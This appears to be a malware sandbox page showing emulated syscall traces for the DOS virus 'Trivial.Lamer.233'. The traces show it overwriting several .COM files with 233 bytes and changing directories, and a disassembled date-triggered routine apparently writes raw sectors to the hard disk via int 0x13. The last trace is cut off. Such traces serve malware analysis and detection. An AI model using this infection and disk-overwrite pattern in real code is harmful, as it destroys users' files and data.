Sample viewer

vx.netlux.org/Virus.DOS.Trivial.Lamer.233

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T23:01:28.905675376Z 9 PC: 12a54 | Display string (String= '')
2018-12-17T23:01:28.907614175Z 9 PC: 12a54 | Display string (String= '')
2018-12-17T23:01:28.908900913Z 9 PC: 12a54 | Display string (String= '')
2018-12-17T23:01:28.910232616Z 9 PC: 12a54 | Display string (String= '')
2018-12-17T23:01:28.911973877Z 9 PC: 12a54 | Display string (String= '')
2018-12-17T23:01:28.913052256Z 9 PC: 12a54 | Display string (String= '')
2018-12-17T23:01:28.914091137Z 9 PC: 12a54 | Display string (String= '')
2018-12-17T23:01:28.915291441Z 9 PC: 12a54 | Display string (String= '')
2018-12-17T23:01:28.926223915Z 9 PC: 12a54 | Display string (String= '')
2018-12-17T23:01:28.927294522Z 9 PC: 12a54 | Display string (String= '')
2018-12-17T23:01:28.928328412Z 9 PC: 12a54 | Display string (String= '')
2018-12-17T23:01:28.929862487Z 9 PC: 12a54 | Display string (String= '')
2018-12-17T23:01:28.941562099Z 9 PC: 12a54 | Display string (String= '')
2018-12-17T23:01:28.942698575Z 9 PC: 12a54 | Display string (String= '')
2018-12-17T23:01:28.944833094Z 9 PC: 12a54 | Display string (String= '')
2018-12-17T23:01:28.946506667Z 9 PC: 12a54 | Display string (String= '')
2018-12-17T23:01:28.948157994Z 9 PC: 12a54 | Display string (String= '')
2018-12-17T23:01:28.949837341Z 9 PC: 12a54 | Display string (String= '')
2018-12-17T23:01:28.951468872Z 9 PC: 12a54 | Display string (String= '')
2018-12-17T23:01:28.95311771Z 9 PC: 12a54 | Display string (String= '')
2018-12-17T23:01:28.954783666Z 9 PC: 12a54 | Display string (String= '')
2018-12-17T23:01:28.95638017Z 9 PC: 12a54 | Display string (String= '')
2018-12-17T23:01:28.957676866Z 9 PC: 12a54 | Display string (String= '')
2018-12-17T23:01:28.958999866Z 9 PC: 12a54 | Display string (String= '')
2018-12-17T23:01:28.960401255Z 9 PC: 12a54 | Display string (String= '')
2018-12-17T23:01:28.961851525Z 9 PC: 12a54 | Display string (String= '')
2018-12-17T23:01:28.963265849Z 9 PC: 12a54 | Display string (String= '')
2018-12-17T23:01:28.964666756Z 9 PC: 12a54 | Display string (String= '')
2018-12-17T23:01:28.966096207Z 9 PC: 12a54 | Display string (String= '')
2018-12-17T23:01:28.967626877Z 9 PC: 12a54 | Display string (String= '')
2018-12-17T23:01:28.969540866Z 9 PC: 12a54 | Display string (String= '')
2018-12-17T23:01:28.972324433Z 9 PC: 12a54 | Display string (String= '')
2018-12-17T23:01:28.9734742Z 9 PC: 12a54 | Display string (String= '')
2018-12-17T23:01:28.974669525Z 9 PC: 12a54 | Display string (String= '')
2018-12-17T23:01:28.976628255Z 9 PC: 12a54 | Display string (String= '')
2018-12-17T23:01:28.977881614Z 9 PC: 12a54 | Display string (String= '')
2018-12-17T23:01:28.979127959Z 9 PC: 12a54 | Display string (String= '')
2018-12-17T23:01:28.980731049Z 9 PC: 12a54 | Display string (String= '')
2018-12-17T23:01:28.982146574Z 9 PC: 12a54 | Display string (String= '')
2018-12-17T23:01:28.983376641Z 9 PC: 12a54 | Display string (String= '')
2018-12-17T23:01:28.984839226Z 9 PC: 12a54 | Display string (String= '')
2018-12-17T23:01:28.986348173Z 9 PC: 12a54 | Display string (String= '')
2018-12-17T23:01:28.987385876Z 9 PC: 12a54 | Display string (String= '')
2018-12-17T23:01:28.988653871Z 9 PC: 12a54 | Display string (String= '')
2018-12-17T23:01:28.989899455Z 9 PC: 12a54 | Display string (String= '')
2018-12-17T23:01:28.990859159Z 9 PC: 12a54 | Display string (String= '')
2018-12-17T23:01:28.991820783Z 9 PC: 12a54 | Display string (String= '')
2018-12-17T23:01:28.993312767Z 9 PC: 12a54 | Display string (String= '')
2018-12-17T23:01:28.994296668Z 9 PC: 12a54 | Display string (String= '')
2018-12-17T23:01:28.995236152Z 9 PC: 12a54 | Display string (String= '')
2018-12-17T23:01:29.001482111Z 9 PC: 12a54 | Display string (String= '')
2018-12-17T23:01:29.013496038Z 9 PC: 12a54 | Display string (String= '')
2018-12-17T23:01:29.014513484Z 9 PC: 12a54 | Display string (String= '')
2018-12-17T23:01:29.016223569Z 9 PC: 12a54 | Display string (String= '')
2018-12-17T23:01:29.017571269Z 9 PC: 12a54 | Display string (String= '')
2018-12-17T23:01:29.018734804Z 9 PC: 12a54 | Display string (String= '')
2018-12-17T23:01:29.020636171Z 9 PC: 12a54 | Display string (String= '')
2018-12-17T23:01:29.021826934Z 9 PC: 12a54 | Display string (String= '')
2018-12-17T23:01:29.022960244Z 9 PC: 12a54 | Display string (String= '')
2018-12-17T23:01:29.025148832Z 9 PC: 12a54 | Display string (String= '')
2018-12-17T23:01:29.026905692Z 9 PC: 12a54 | Display string (String= '')
2018-12-17T23:01:29.028189918Z 9 PC: 12a54 | Display string (String= '')
2018-12-17T23:01:29.030204792Z 9 PC: 12a54 | Display string (String= '')
2018-12-17T23:01:29.031625704Z 9 PC: 12a54 | Display string (String= '')
2018-12-17T23:01:29.033347978Z 9 PC: 12a54 | Display string (String= '')
2018-12-17T23:01:29.035018642Z 9 PC: 12a54 | Display string (String= '')
2018-12-17T23:01:29.036334295Z 9 PC: 12a54 | Display string (String= '')
2018-12-17T23:01:29.037604107Z 9 PC: 12a54 | Display string (String= '')
2018-12-17T23:01:29.039763448Z 9 PC: 12a54 | Display string (String= '')
2018-12-17T23:01:29.041076731Z 9 PC: 12a54 | Display string (String= '')
2018-12-17T23:01:29.042381394Z 9 PC: 12a54 | Display string (String= '')
2018-12-17T23:01:29.043874838Z 9 PC: 12a54 | Display string (String= '')
2018-12-17T23:01:29.045811026Z 9 PC: 12a54 | Display string (String= '')
2018-12-17T23:01:29.047001552Z 9 PC: 12a54 | Display string (String= '')
2018-12-17T23:01:29.047993347Z 9 PC: 12a54 | Display string (String= '')
2018-12-17T23:01:29.049309554Z 9 PC: 12a54 | Display string (String= '')
2018-12-17T23:01:29.050300789Z 9 PC: 12a54 | Display string (String= '')
2018-12-17T23:01:29.051273667Z 9 PC: 12a54 | Display string (String= '')
2018-12-17T23:01:29.053245908Z 9 PC: 12a54 | Display string (String= '')
2018-12-17T23:01:29.054572287Z 9 PC: 12a54 | Display string (String= '')
2018-12-17T23:01:29.055820758Z 9 PC: 12a54 | Display string (String= '')
2018-12-17T23:01:29.069296674Z 9 PC: 12a54 | Display string (String= '')
2018-12-17T23:01:29.086709018Z 9 PC: 12a54 | Display string (String= '')
2018-12-17T23:01:29.091324882Z 9 PC: 12a54 | Display string (String= '')
2018-12-17T23:01:29.09302357Z 9 PC: 12a54 | Display string (String= '')
2018-12-17T23:01:29.095159809Z 9 PC: 12a54 | Display string (String= '')
2018-12-17T23:01:29.109863346Z 9 PC: 12a54 | Display string (String= '')
2018-12-17T23:01:29.111740356Z 9 PC: 12a54 | Display string (String= '')
2018-12-17T23:01:29.112879853Z 9 PC: 12a54 | Display string (String= '')
2018-12-17T23:01:29.113857465Z 9 PC: 12a54 | Display string (String= '')
2018-12-17T23:01:29.115166204Z 9 PC: 12a54 | Display string (String= '')
2018-12-17T23:01:29.116077138Z 9 PC: 12a54 | Display string (String= '')
2018-12-17T23:01:29.116931878Z 9 PC: 12a54 | Display string (String= '')
2018-12-17T23:01:29.118234773Z 9 PC: 12a54 | Display string (String= '')
2018-12-17T23:01:29.119218944Z 9 PC: 12a54 | Display string (String= '')
2018-12-17T23:01:29.120089139Z 9 PC: 12a54 | Display string (String= '')
2018-12-17T23:01:29.12144234Z 9 PC: 12a54 | Display string (String= '')
2018-12-17T23:01:29.12236361Z 9 PC: 12a54 | Display string (String= '')
2018-12-17T23:01:29.123343334Z 9 PC: 12a54 | Display string (String= '')
2018-12-17T23:01:29.124780735Z 9 PC: 12a54 | Display string (String= '')
2018-12-17T23:01:29.125628642Z 9 PC: 12a54 | Display string (String= '')
2018-12-17T23:01:29.126475619Z 78 PC: 12aa6 | Find first file
2018-12-17T23:01:29.130645799Z 61 PC: 12ab0 | Open file (Filename = 'SLEEP.COM')
2018-12-17T23:01:29.134760727Z 64 PC: 12abb | Write file or device (Write 233 bytes on handle 5)
2018-12-17T23:01:29.138893742Z 62 PC: 12abf | Close file
2018-12-17T23:01:29.150981666Z 79 PC: 12ac9 | Find next file
2018-12-17T23:01:29.153574824Z 61 PC: 12ab0 | Open file (Filename = 'PRINT.COM')
2018-12-17T23:01:29.167814364Z 64 PC: 12abb | Write file or device (Write 233 bytes on handle 5)
2018-12-17T23:01:29.18791861Z 62 PC: 12abf | Close file
2018-12-17T23:01:29.195709658Z 79 PC: 12ac9 | Find next file
2018-12-17T23:01:29.198589253Z 61 PC: 12ab0 | Open file (Filename = 'HELLO.COM')
2018-12-17T23:01:29.206149039Z 64 PC: 12abb | Write file or device (Write 233 bytes on handle 5)
2018-12-17T23:01:29.214313301Z 62 PC: 12abf | Close file
2018-12-17T23:01:29.222238408Z 79 PC: 12ac9 | Find next file
2018-12-17T23:01:29.225785457Z 61 PC: 12ab0 | Open file (Filename = 'PHANG.COM')
2018-12-17T23:01:29.233125207Z 64 PC: 12abb | Write file or device (Write 233 bytes on handle 5)
2018-12-17T23:01:29.239949414Z 62 PC: 12abf | Close file
2018-12-17T23:01:29.24834794Z 79 PC: 12ac9 | Find next file
2018-12-17T23:01:29.251247447Z 61 PC: 12ab0 | Open file (Filename = 'PRINTA~1.COM')
2018-12-17T23:01:29.258099833Z 64 PC: 12abb | Write file or device (Write 233 bytes on handle 5)
2018-12-17T23:01:29.265701616Z 62 PC: 12abf | Close file
2018-12-17T23:01:29.27356064Z 79 PC: 12ac9 | Find next file
2018-12-17T23:01:29.276416409Z 61 PC: 12ab0 | Open file (Filename = 'MANDEL.COM')
2018-12-17T23:01:29.28388121Z 64 PC: 12abb | Write file or device (Write 233 bytes on handle 5)
2018-12-17T23:01:29.29074061Z 62 PC: 12abf | Close file
2018-12-17T23:01:29.300110958Z 79 PC: 12ac9 | Find next file
2018-12-17T23:01:29.303750858Z 61 PC: 12ab0 | Open file (Filename = 'PAH.COM')
2018-12-17T23:01:29.310701067Z 64 PC: 12abb | Write file or device (Write 233 bytes on handle 5)
2018-12-17T23:01:29.317503478Z 62 PC: 12abf | Close file
2018-12-17T23:01:29.326207101Z 79 PC: 12ac9 | Find next file
2018-12-17T23:01:29.329150152Z 61 PC: 12ab0 | Open file (Filename = 'TEST.COM')
2018-12-17T23:01:29.335836821Z 64 PC: 12abb | Write file or device (Write 233 bytes on handle 5)
2018-12-17T23:01:29.339604932Z 62 PC: 12abf | Close file
2018-12-17T23:01:29.347558755Z 79 PC: 12ac9 | Find next file
2018-12-17T23:01:29.350240989Z 59 PC: 12ad2 | Change current directory
2018-12-17T23:01:29.360003067Z 78 PC: 12aa6 | Find first file
2018-12-17T23:01:29.369660134Z 61 PC: 12ab0 | Open file (Filename = 'SLEEP.COM')
2018-12-17T23:01:29.376324055Z 64 PC: 12abb | Write file or device (Write 233 bytes on handle 5)
2018-12-17T23:01:29.384232007Z 62 PC: 12abf | Close file
2018-12-17T23:01:29.39208081Z 79 PC: 12ac9 | Find next file
2018-12-17T23:01:29.394956977Z 61 PC: 12ab0 | Open file (Filename = 'PRINT.COM')
2018-12-17T23:01:29.402294386Z 64 PC: 12abb | Write file or device (Write 233 bytes on handle 5)
2018-12-17T23:01:29.40980428Z 62 PC: 12abf | Close file
2018-12-17T23:01:29.417616371Z 79 PC: 12ac9 | Find next file
2018-12-17T23:01:29.421359899Z 61 PC: 12ab0 | Open file (Filename = 'HELLO.COM')
2018-12-17T23:01:29.428779414Z 64 PC: 12abb | Write file or device (Write 233 bytes on handle 5)
2018-12-17T23:01:29.435512933Z 62 PC: 12abf | Close file
2018-12-17T23:01:29.444136844Z 79 PC: 12ac9 | Find next file
2018-12-17T23:01:29.447246069Z 61 PC: 12ab0 | Open file (Filename = 'PHANG.COM')
2018-12-17T23:01:29.454723908Z 64 PC: 12abb | Write file or device (Write 233 bytes on handle 5)
2018-12-17T23:01:29.466980063Z 62 PC: 12abf | Close file
2018-12-17T23:01:29.475253199Z 79 PC: 12ac9 | Find next file
2018-12-17T23:01:29.47820039Z 61 PC: 12ab0 | Open file (Filename = 'PRINTA~1.COM')
2018-12-17T23:01:29.485130324Z 64 PC: 12abb | Write file or device (Write 233 bytes on handle 5)
2018-12-17T23:01:29.493128246Z 62 PC: 12abf | Close file
2018-12-17T23:01:29.501387261Z 79 PC: 12ac9 | Find next file
2018-12-17T23:01:29.504211801Z 61 PC: 12ab0 | Open file (Filename = 'MANDEL.COM')
2018-12-17T23:01:29.511972923Z 64 PC: 12abb | Write file or device (Write 233 bytes on handle 5)
2018-12-17T23:01:29.519011588Z 62 PC: 12abf | Close file
2018-12-17T23:01:29.527122009Z 79 PC: 12ac9 | Find next file
2018-12-17T23:01:29.530584936Z 61 PC: 12ab0 | Open file (Filename = 'PAH.COM')
2018-12-17T23:01:29.53733379Z 64 PC: 12abb | Write file or device (Write 233 bytes on handle 5)
2018-12-17T23:01:29.544235808Z 62 PC: 12abf | Close file
2018-12-17T23:01:29.553734946Z 79 PC: 12ac9 | Find next file
2018-12-17T23:01:29.556669267Z 61 PC: 12ab0 | Open file (Filename = 'TEST.COM')
2018-12-17T23:01:29.563297894Z 64 PC: 12abb | Write file or device (Write 233 bytes on handle 5)
2018-12-17T23:01:29.5706799Z 62 PC: 12abf | Close file
2018-12-17T23:01:29.578364419Z 79 PC: 12ac9 | Find next file
2018-12-17T23:01:29.580966474Z 59 PC: 12ad2 | Change current directory
2018-12-17T23:01:29.585864014Z 42 PC: 12ad9 | Get date 0x12ad9: mov dl, 0
0x12adb: cmp al, dl
0x12add: jne 0x12b55
0x12adf: mov ax, cs
0x12ae1: mov ds, ax
0x12ae3: mov ah, 9
0x12ae5: mov dx, 0x126
0x12ae8: int 0x21
0x12aea: mov ax, 0x440d
0x12aed: mov cx, 0x84b
0x12af0: mov bh, 0
0x12af2: xor dx, dx
0x12af4: int 0x21
0x12af6: xor dx, dx
0x12af8: mov cx, 2
0x12afb: mov ax, 0x311
0x12afe: mov dl, 0x80
0x12b00: mov bx, 0x3000
0x12b03: mov es, bx
0x12b05: int 0x13
2018-12-17T23:01:29.588171588Z 76 PC: 12b39 | Terminate with return code (Return code = '1')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":13897,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:39:19.663742249Z 9 PC: 12a54 | Display string (String= '')
2018-12-25T12:39:19.665829019Z 9 PC: 12a54 | Display string (See above)
2018-12-25T12:39:19.667435775Z 9 PC: 12a54 | Display string (See above)
2018-12-25T12:39:19.668876654Z 9 PC: 12a54 | Display string (See above)
2018-12-25T12:39:19.670582568Z 9 PC: 12a54 | Display string (See above)
2018-12-25T12:39:19.672928239Z 9 PC: 12a54 | Display string (See above)
2018-12-25T12:39:19.674271986Z 9 PC: 12a54 | Display string (See above)
2018-12-25T12:39:19.675792313Z 9 PC: 12a54 | Display string (See above)
2018-12-25T12:39:19.678338903Z 9 PC: 12a54 | Display string (See above)
2018-12-25T12:39:19.679647558Z 9 PC: 12a54 | Display string (See above)
2018-12-25T12:39:19.685066425Z 9 PC: 12a54 | Display string (See above)
2018-12-25T12:39:19.692812648Z 9 PC: 12a54 | Display string (See above)
2018-12-25T12:39:19.694396755Z 9 PC: 12a54 | Display string (See above)
2018-12-25T12:39:19.696024608Z 9 PC: 12a54 | Display string (See above)
2018-12-25T12:39:19.69863292Z 9 PC: 12a54 | Display string (See above)
2018-12-25T12:39:19.70068349Z 9 PC: 12a54 | Display string (See above)
2018-12-25T12:39:19.702322523Z 9 PC: 12a54 | Display string (See above)
2018-12-25T12:39:19.705058224Z 9 PC: 12a54 | Display string (See above)
2018-12-25T12:39:19.706343569Z 9 PC: 12a54 | Display string (See above)
2018-12-25T12:39:19.707603033Z 9 PC: 12a54 | Display string (See above)
2018-12-25T12:39:19.710795945Z 9 PC: 12a54 | Display string (See above)
2018-12-25T12:39:19.712932777Z 9 PC: 12a54 | Display string (See above)
2018-12-25T12:39:19.714097476Z 9 PC: 12a54 | Display string (See above)
2018-12-25T12:39:19.715281527Z 9 PC: 12a54 | Display string (See above)
2018-12-25T12:39:19.719610811Z 9 PC: 12a54 | Display string (See above)
2018-12-25T12:39:19.721036158Z 9 PC: 12a54 | Display string (See above)
2018-12-25T12:39:19.722299572Z 9 PC: 12a54 | Display string (See above)
2018-12-25T12:39:19.724438175Z 9 PC: 12a54 | Display string (See above)
2018-12-25T12:39:19.726042833Z 9 PC: 12a54 | Display string (See above)
2018-12-25T12:39:19.743475875Z 9 PC: 12a54 | Display string (See above)
2018-12-25T12:39:19.746148132Z 9 PC: 12a54 | Display string (See above)
2018-12-25T12:39:19.749649508Z 9 PC: 12a54 | Display string (See above)
2018-12-25T12:39:19.75118517Z 9 PC: 12a54 | Display string (See above)
2018-12-25T12:39:19.755553248Z 9 PC: 12a54 | Display string (See above)
2018-12-25T12:39:19.76172646Z 9 PC: 12a54 | Display string (See above)
2018-12-25T12:39:19.776814297Z 9 PC: 12a54 | Display string (See above)
2018-12-25T12:39:19.779089493Z 9 PC: 12a54 | Display string (See above)
2018-12-25T12:39:19.780783054Z 9 PC: 12a54 | Display string (See above)
2018-12-25T12:39:19.782262276Z 9 PC: 12a54 | Display string (See above)
2018-12-25T12:39:19.784225063Z 9 PC: 12a54 | Display string (See above)
2018-12-25T12:39:19.786676016Z 9 PC: 12a54 | Display string (See above)
2018-12-25T12:39:19.787905804Z 9 PC: 12a54 | Display string (See above)
2018-12-25T12:39:19.789022688Z 9 PC: 12a54 | Display string (See above)
2018-12-25T12:39:19.790757632Z 9 PC: 12a54 | Display string (See above)
2018-12-25T12:39:19.792119776Z 9 PC: 12a54 | Display string (See above)
2018-12-25T12:39:19.793384004Z 9 PC: 12a54 | Display string (See above)
2018-12-25T12:39:19.795390582Z 9 PC: 12a54 | Display string (See above)
2018-12-25T12:39:19.796681657Z 9 PC: 12a54 | Display string (See above)
2018-12-25T12:39:19.79819705Z 9 PC: 12a54 | Display string (See above)
2018-12-25T12:39:19.800278757Z 9 PC: 12a54 | Display string (See above)
2018-12-25T12:39:19.801381144Z 9 PC: 12a54 | Display string (See above)
2018-12-25T12:39:19.802486985Z 9 PC: 12a54 | Display string (See above)
2018-12-25T12:39:19.804393805Z 9 PC: 12a54 | Display string (See above)
2018-12-25T12:39:19.805751511Z 9 PC: 12a54 | Display string (See above)
2018-12-25T12:39:19.807006091Z 9 PC: 12a54 | Display string (See above)
2018-12-25T12:39:19.809093674Z 9 PC: 12a54 | Display string (See above)
2018-12-25T12:39:19.810709052Z 9 PC: 12a54 | Display string (See above)
2018-12-25T12:39:19.812235258Z 9 PC: 12a54 | Display string (See above)
2018-12-25T12:39:19.813749018Z 9 PC: 12a54 | Display string (See above)
2018-12-25T12:39:19.815737151Z 9 PC: 12a54 | Display string (See above)
2018-12-25T12:39:19.817398357Z 9 PC: 12a54 | Display string (See above)
2018-12-25T12:39:19.819009363Z 9 PC: 12a54 | Display string (See above)
2018-12-25T12:39:19.82158603Z 9 PC: 12a54 | Display string (See above)
2018-12-25T12:39:19.823139174Z 9 PC: 12a54 | Display string (See above)
2018-12-25T12:39:19.824732175Z 9 PC: 12a54 | Display string (See above)
2018-12-25T12:39:19.826905342Z 9 PC: 12a54 | Display string (See above)
2018-12-25T12:39:19.828464873Z 9 PC: 12a54 | Display string (See above)
2018-12-25T12:39:19.830041537Z 9 PC: 12a54 | Display string (See above)
2018-12-25T12:39:19.83344123Z 9 PC: 12a54 | Display string (See above)
2018-12-25T12:39:19.835115222Z 9 PC: 12a54 | Display string (See above)
2018-12-25T12:39:19.83681487Z 9 PC: 12a54 | Display string (See above)
2018-12-25T12:39:19.839208034Z 9 PC: 12a54 | Display string (See above)
2018-12-25T12:39:19.840872453Z 9 PC: 12a54 | Display string (See above)
2018-12-25T12:39:19.842551743Z 9 PC: 12a54 | Display string (See above)
2018-12-25T12:39:19.845274026Z 9 PC: 12a54 | Display string (See above)
2018-12-25T12:39:19.847038138Z 9 PC: 12a54 | Display string (See above)
2018-12-25T12:39:19.849582241Z 9 PC: 12a54 | Display string (See above)
2018-12-25T12:39:19.851475975Z 9 PC: 12a54 | Display string (See above)
2018-12-25T12:39:19.853621541Z 9 PC: 12a54 | Display string (See above)
2018-12-25T12:39:19.854975651Z 9 PC: 12a54 | Display string (See above)
2018-12-25T12:39:19.856305109Z 9 PC: 12a54 | Display string (See above)
2018-12-25T12:39:19.85865637Z 9 PC: 12a54 | Display string (See above)
2018-12-25T12:39:19.859937602Z 9 PC: 12a54 | Display string (See above)
2018-12-25T12:39:19.86122945Z 9 PC: 12a54 | Display string (See above)
2018-12-25T12:39:19.863034414Z 9 PC: 12a54 | Display string (See above)
2018-12-25T12:39:19.864944242Z 9 PC: 12a54 | Display string (See above)
2018-12-25T12:39:19.866561225Z 9 PC: 12a54 | Display string (See above)
2018-12-25T12:39:19.868457668Z 9 PC: 12a54 | Display string (See above)
2018-12-25T12:39:19.86997937Z 9 PC: 12a54 | Display string (See above)
2018-12-25T12:39:19.871161072Z 9 PC: 12a54 | Display string (See above)
2018-12-25T12:39:19.873511289Z 9 PC: 12a54 | Display string (See above)
2018-12-25T12:39:19.875362777Z 9 PC: 12a54 | Display string (See above)
2018-12-25T12:39:19.876790343Z 9 PC: 12a54 | Display string (See above)
2018-12-25T12:39:19.878923254Z 9 PC: 12a54 | Display string (See above)
2018-12-25T12:39:19.880441235Z 9 PC: 12a54 | Display string (See above)
2018-12-25T12:39:19.882000311Z 9 PC: 12a54 | Display string (See above)
2018-12-25T12:39:19.883188757Z 9 PC: 12a54 | Display string (See above)
2018-12-25T12:39:19.88591541Z 9 PC: 12a54 | Display string (See above)
2018-12-25T12:39:19.887455855Z 9 PC: 12a54 | Display string (See above)
2018-12-25T12:39:19.889361443Z 9 PC: 12a54 | Display string (See above)
2018-12-25T12:39:19.892111175Z 9 PC: 12a54 | Display string (See above)
2018-12-25T12:39:19.893536074Z 78 PC: 12aa6 | Find first file
2018-12-25T12:39:19.900796151Z 61 PC: 12ab0 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:39:19.911645624Z 64 PC: 12abb | Write file or device (Write 233 bytes on handle 5)
2018-12-25T12:39:19.919363636Z 62 PC: 12abf | Close file
2018-12-25T12:39:19.936326635Z 79 PC: 12ac9 | Find next file
2018-12-25T12:39:19.941042436Z 61 PC: 12ab0 | Open file (See above)
2018-12-25T12:39:19.948926146Z 64 PC: 12abb | Write file or device (See above)
2018-12-25T12:39:19.956727986Z 62 PC: 12abf | Close file (See above)
2018-12-25T12:39:19.965756776Z 79 PC: 12ac9 | Find next file (See above)
2018-12-25T12:39:19.969228338Z 61 PC: 12ab0 | Open file (See above)
2018-12-25T12:39:19.976927421Z 64 PC: 12abb | Write file or device (See above)
2018-12-25T12:39:19.98473868Z 62 PC: 12abf | Close file (See above)
2018-12-25T12:39:19.994510447Z 79 PC: 12ac9 | Find next file (See above)
2018-12-25T12:39:19.997817922Z 61 PC: 12ab0 | Open file (See above)
2018-12-25T12:39:20.006223434Z 64 PC: 12abb | Write file or device (See above)
2018-12-25T12:39:20.015104507Z 62 PC: 12abf | Close file (See above)
2018-12-25T12:39:20.024127675Z 79 PC: 12ac9 | Find next file (See above)
2018-12-25T12:39:20.027444629Z 61 PC: 12ab0 | Open file (See above)
2018-12-25T12:39:20.035308479Z 64 PC: 12abb | Write file or device (See above)
2018-12-25T12:39:20.042904073Z 62 PC: 12abf | Close file (See above)
2018-12-25T12:39:20.051574795Z 79 PC: 12ac9 | Find next file (See above)
2018-12-25T12:39:20.055720435Z 61 PC: 12ab0 | Open file (See above)
2018-12-25T12:39:20.063332087Z 64 PC: 12abb | Write file or device (See above)
2018-12-25T12:39:20.071518915Z 62 PC: 12abf | Close file (See above)
2018-12-25T12:39:20.08134127Z 79 PC: 12ac9 | Find next file (See above)
2018-12-25T12:39:20.084794196Z 61 PC: 12ab0 | Open file (See above)
2018-12-25T12:39:20.092457792Z 64 PC: 12abb | Write file or device (See above)
2018-12-25T12:39:20.101017732Z 62 PC: 12abf | Close file (See above)
2018-12-25T12:39:20.11014089Z 79 PC: 12ac9 | Find next file (See above)
2018-12-25T12:39:20.11349053Z 61 PC: 12ab0 | Open file (See above)
2018-12-25T12:39:20.121390215Z 64 PC: 12abb | Write file or device (See above)
2018-12-25T12:39:20.125600659Z 62 PC: 12abf | Close file (See above)
2018-12-25T12:39:20.135138823Z 79 PC: 12ac9 | Find next file (See above)
2018-12-25T12:39:20.137434445Z 59 PC: 12ad2 | Change current directory
2018-12-25T12:39:20.140860657Z 78 PC: 12aa6 | Find first file (See above)
2018-12-25T12:39:20.145027663Z 61 PC: 12ab0 | Open file (See above)
2018-12-25T12:39:20.14948719Z 64 PC: 12abb | Write file or device (See above)
2018-12-25T12:39:20.152238355Z 62 PC: 12abf | Close file (See above)
2018-12-25T12:39:20.15741804Z 79 PC: 12ac9 | Find next file (See above)
2018-12-25T12:39:20.159478228Z 61 PC: 12ab0 | Open file (See above)
2018-12-25T12:39:20.168392758Z 64 PC: 12abb | Write file or device (See above)
2018-12-25T12:39:20.173200388Z 62 PC: 12abf | Close file (See above)
2018-12-25T12:39:20.179290171Z 79 PC: 12ac9 | Find next file (See above)
2018-12-25T12:39:20.182094064Z 61 PC: 12ab0 | Open file (See above)
2018-12-25T12:39:20.189720305Z 64 PC: 12abb | Write file or device (See above)
2018-12-25T12:39:20.19429861Z 62 PC: 12abf | Close file (See above)
2018-12-25T12:39:20.200252096Z 79 PC: 12ac9 | Find next file (See above)
2018-12-25T12:39:20.202273102Z 61 PC: 12ab0 | Open file (See above)
2018-12-25T12:39:20.20672028Z 64 PC: 12abb | Write file or device (See above)
2018-12-25T12:39:20.215035417Z 62 PC: 12abf | Close file (See above)
2018-12-25T12:39:20.223496759Z 79 PC: 12ac9 | Find next file (See above)
2018-12-25T12:39:20.225511447Z 61 PC: 12ab0 | Open file (See above)
2018-12-25T12:39:20.23038795Z 64 PC: 12abb | Write file or device (See above)
2018-12-25T12:39:20.235054663Z 62 PC: 12abf | Close file (See above)
2018-12-25T12:39:20.24119899Z 79 PC: 12ac9 | Find next file (See above)
2018-12-25T12:39:20.244183184Z 61 PC: 12ab0 | Open file (See above)
2018-12-25T12:39:20.257323558Z 64 PC: 12abb | Write file or device (See above)
2018-12-25T12:39:20.265757834Z 62 PC: 12abf | Close file (See above)
2018-12-25T12:39:20.276078514Z 79 PC: 12ac9 | Find next file (See above)
2018-12-25T12:39:20.279646092Z 61 PC: 12ab0 | Open file (See above)
2018-12-25T12:39:20.287647377Z 64 PC: 12abb | Write file or device (See above)
2018-12-25T12:39:20.296697357Z 62 PC: 12abf | Close file (See above)
2018-12-25T12:39:20.30615129Z 79 PC: 12ac9 | Find next file (See above)
2018-12-25T12:39:20.308187118Z 61 PC: 12ab0 | Open file (See above)
2018-12-25T12:39:20.313668282Z 64 PC: 12abb | Write file or device (See above)
2018-12-25T12:39:20.321726962Z 62 PC: 12abf | Close file (See above)
2018-12-25T12:39:20.331608831Z 79 PC: 12ac9 | Find next file (See above)
2018-12-25T12:39:20.335784662Z 59 PC: 12ad2 | Change current directory (See above)
2018-12-25T12:39:20.341355196Z 42 PC: 12ad9 | Get date 0x12ad9: mov dl, 0
0x12adb: cmp al, dl
0x12add: jne 0x12b55
0x12adf: mov ax, cs
0x12ae1: mov ds, ax
0x12ae3: mov ah, 9
0x12ae5: mov dx, 0x126
0x12ae8: int 0x21
0x12aea: mov ax, 0x440d
0x12aed: mov cx, 0x84b
0x12af0: mov bh, 0
0x12af2: xor dx, dx
0x12af4: int 0x21
0x12af6: xor dx, dx
0x12af8: mov cx, 2
0x12afb: mov ax, 0x311
0x12afe: mov dl, 0x80
0x12b00: mov bx, 0x3000
0x12b03: mov es, bx
0x12b05: int 0x13
2018-12-25T12:39:20.344416429Z 76 PC: 12b39 | Terminate with return code (Return code = '2')

{"DateBased":true,"Day":6,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":13897,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:39:19.795386243Z 9 PC: 12a54 | Display string (String= '')
2018-12-25T12:39:19.798675001Z 9 PC: 12a54 | Display string (See above)
2018-12-25T12:39:19.800399305Z 9 PC: 12a54 | Display string (See above)
2018-12-25T12:39:19.802000621Z 9 PC: 12a54 | Display string (See above)
2018-12-25T12:39:19.803881831Z 9 PC: 12a54 | Display string (See above)
2018-12-25T12:39:19.805498503Z 9 PC: 12a54 | Display string (See above)
2018-12-25T12:39:19.806807811Z 9 PC: 12a54 | Display string (See above)
2018-12-25T12:39:19.81328655Z 9 PC: 12a54 | Display string (See above)
2018-12-25T12:39:19.816411695Z 9 PC: 12a54 | Display string (See above)
2018-12-25T12:39:19.81815918Z 9 PC: 12a54 | Display string (See above)
2018-12-25T12:39:19.819916542Z 9 PC: 12a54 | Display string (See above)
2018-12-25T12:39:19.822493462Z 9 PC: 12a54 | Display string (See above)
2018-12-25T12:39:19.823934685Z 9 PC: 12a54 | Display string (See above)
2018-12-25T12:39:19.827425683Z 9 PC: 12a54 | Display string (See above)
2018-12-25T12:39:19.830365839Z 9 PC: 12a54 | Display string (See above)
2018-12-25T12:39:19.832894111Z 9 PC: 12a54 | Display string (See above)
2018-12-25T12:39:19.835089619Z 9 PC: 12a54 | Display string (See above)
2018-12-25T12:39:19.838482323Z 9 PC: 12a54 | Display string (See above)
